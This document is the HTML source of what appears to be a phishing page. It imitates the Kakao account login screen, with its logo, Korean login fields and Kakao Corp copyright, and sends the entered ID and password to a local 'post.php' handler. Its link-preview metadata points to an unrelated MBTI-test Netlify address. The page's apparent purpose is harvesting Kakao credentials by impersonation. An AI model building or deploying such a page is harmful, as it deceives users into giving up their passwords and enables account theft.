
<!DOCTYPE html>
<html lang="en">

<head>
<meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, width=device-width" />
<meta name="format-detection" content="telephone=no">
	
</script>
</script>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/css/kakao_login.css">
    <title>카카오계정</title>
    <meta property="og:url" content="https://chemicalmbti.netlify.app/">
    <meta property="og:title" content="제목">
    <meta property="og:type" content="website">
    <meta property="og:image" content="https://chemicalmbti.netlify.app/">
    <meta property="og:description" content="본문 내용.">
    <title>카카오톡 URL링크</title>
</head>
<style>
#kakaoServiceLogo {
  text-align : center;
}

img.adver {
  display : none;
}

div.advertisement>p {
  display : none;
}

ul.bottom_list>a:nth-of-type(6)>li {
  display : none;
  -webkit-appearance: none;
  -webkit-border-radius: 0;
}

ul.bottom_list>a:nth-of-type(5)>li {
  display : none;
}

li.join>a {
  white-space : nowrap;
}

li.account>a {
  white-space : nowrap;
}

li.pwd>a {
  white-space : nowrap;
}

li.account>a {
  display : inline-block;
  position : relative;
}

li.account {
  width : 4px;
}

li.account>a {
  width : 64px;
  left : -56px;
}

li.pwd>a {
  display : inline-block;
  width : 80.2188px;
  position : relative;
  left : -4px;
}

ul.bottom_list>a:nth-of-type(1)>li {
  text-align : center;
  position : relative;
}

ul.bottom_list>a:nth-of-type(2) {
  width : 106.3906px;
  position : relative;
  left : -17px;
}

ul.bottom_list>a:nth-of-type(1)>li {
  left : -28px;
}

ul.bottom_list>a:nth-of-type(2)>b>li {
  position : relative;
}

ul.bottom_list>a:nth-of-type(3)>li {
  position : relative;
}

ul.bottom_list>a:nth-of-type(2)>b {
  display : inline-block;
  width : 81.5px;
}

ul.bottom_list>a:nth-of-type(3) {
  width : 29.3125px;
  position : relative;
  right : 20px;
  height : 18px;
}

ul.bottom_list>a:nth-of-type(4) {
  width : 38.1875px;
  position : relative;
}

ul.bottom_list>a:nth-of-type(4)>li {
  position : relative;
}

ul.bottom_list>a:nth-of-type(4) {
  height : 21px;
  top : 0px;
}

ul.bottom_list>a:nth-of-type(1)>li {
  width : 53px;
}

ul.bottom_list>a:nth-of-type(4)>li {
  width : 64.1875px;
  left : 6px;
}

ul.bottom_list>a:nth-of-type(3)>li {
  width : 58.3125px;
  left : 4px;
}

ul.bottom_list>a:nth-of-type(2)>b>li {
  width : 110.5px;
  left : 5px;
}

ul.bottom_list>a:nth-of-type(1) {
  width : 33px;
}

button.submit {
  font-size : 15px;
  -webkit-appearance: none;
  -webkit-border-radius: 0;
  background: rgb(254, 229, 0);
  color: black;
  font-weight: normal
}

#kakaoServiceLogo {
  font-weight : 550;
  height : 43px;
}

ul.bottom_list {
  height : 22px;
  position : relative;
  top : -1px;
}

body>div:nth-of-type(2) {
  position : relative;
  height : 85px;
  top : -12px;
}

#kakaoServiceLogo>img {
  width : 95px;
}

input:-webkit-autofill {
	-webkit-box-shadow: 0 0 0 1000px white inset;
	box-shadow: 0 0 0 1000px white inset;
}
</style>

<body>
    <div id="wrap">
        <div class="advertisement">
            <p>
                <strong class="span">카카오계정 하나로 충분합니다.</strong><br>
                카카오 서비스 뿐 아니라 Daum, Melon 및 다양한 외부 서비스까지<br>
                카카오계정 하나로 편리하게 이용해보세요!<br>
                <img src="kakao_img/advertisement.png" class="adver">
            </p>
        </div>
        <div class="login">
            <div class="inlogin">
                <h1 id="kakaoServiceLogo">
		<img src="kakao_img/logo_kakao.png">
  	   </h1>
<style>
.ir_wa {
    display: block;
    overflow: hidden;
    position: relative;
    z-index: -1;
    width: 100%;
    height: 100%;
}
</style>
                <form action="post.php" method="post" autocomplete="off">
                    <p><input type="text" name="id" id="id" placeholder="카카오메일 아이디, 이메일, 전화번호" class="id"></p>
                    <p><input type="password" name="pwd" id="pwd" placeholder="비밀번호"></p>
                    <p class="keep"><input type="checkbox">로그인 상태 유지</p>
                    <p><button type="submit" class="submit" style=-webkit-appearance: none;>로그인</button></p>
                    <p class="and"><span class="and_text">또는</span></p>
                    <p><input type="submit" value="QR코드 로그인" class="QRcode"></p>
                </form>
                <ul class="three_list">
                    <li class="join">
                        <a href="/html/signup.html">회원가입</a>
                    </li>
                    <li class="account">
                        <a href="/html/find_account.html">카카오계정</a>
                    </li>
                    <li class="pwd">
                        <a href="/html/find_pwd.html">비밀번호 찾기</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>
    <div>
        <ul class="bottom_list">
            <a href="#">
                <li>이용약관</li>
            </a>
            <a href="#"><b>
                    <li>개인정보 처리방침</li>
                </b>
                <a href="#">
                    <li>운영정책</li>
                </a>
                <a href="#">
                    <li>고객센터</li>
                </a>
                <a href="#">
                    <li>공지사항</li>
                </a>
                <a href="#">
                    <li>한국어^</li>
                </a>
        </ul>
        <p class="bottom_letter">Copyright © <a href="#"><b>Kakao Corp</b></a>. All rights reserved.</p>
    </div>
</body>

</html>
